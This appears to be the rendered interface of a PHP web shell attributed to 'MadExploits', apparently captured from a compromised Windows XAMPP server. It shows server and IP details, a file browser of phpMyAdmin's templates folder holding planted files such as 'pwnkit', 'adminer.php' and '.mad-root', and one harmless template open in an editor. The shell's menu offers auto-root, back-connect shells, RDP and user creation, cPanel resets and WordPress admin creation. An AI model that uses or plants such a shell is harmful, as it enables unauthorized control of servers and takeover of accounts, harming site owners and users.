Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.51
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
table /
[ HOME SHELL ]
Name
Size
Permission
Action
browse_foreigners
[ DIR ]
drwxrwxrwx
chart
[ DIR ]
drwxrwxrwx
delete
[ DIR ]
drwxrwxrwx
export
[ DIR ]
drwxrwxrwx
find_replace
[ DIR ]
drwxrwxrwx
gis_visualization
[ DIR ]
drwxrwxrwx
import
[ DIR ]
drwxrwxrwx
insert
[ DIR ]
drwxrwxrwx
maintenance
[ DIR ]
drwxrwxrwx
operations
[ DIR ]
drwxrwxrwx
partition
[ DIR ]
drwxrwxrwx
privileges
[ DIR ]
drwxrwxrwx
relation
[ DIR ]
drwxrwxrwx
search
[ DIR ]
drwxrwxrwx
structure
[ DIR ]
drwxrwxrwx
tracking
[ DIR ]
drwxrwxrwx
zoom_search
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
index_form.twig
10.26
KB
-rw-rw-rw-
index_rename_form.twig
1.01
KB
-rw-rw-rw-
page_with_secondary_tabs.twig
986
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
start_and_number_of_rows_field...
946
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index_rename_form.twig
<form action="{{ url('/table/indexes/rename') }}" method="post" name="index_frm" id="index_frm" class="ajax"> {{ get_hidden_inputs(form_params) }} <fieldset class="pma-fieldset" id="index_edit_fields"> <div class="index_info"> <div> <div class="label"> <strong> <label for="input_index_name"> {% trans 'Index name:' %} {{ show_hint('"PRIMARY" <b>must</b> be the name of and <b>only of</b> a primary key!'|trans) }} </label> </strong> </div> <input type="text" name="index[Key_name]" id="input_index_name" size="25" maxlength="64" value="{{ index.getName() }}" onfocus="this.select()"> </div> </div> </fieldset> <fieldset class="pma-fieldset tblFooters"> <button class="btn btn-secondary" type="submit" id="preview_index_frm">{% trans 'Preview SQL' %}</button> </fieldset> </form>
Close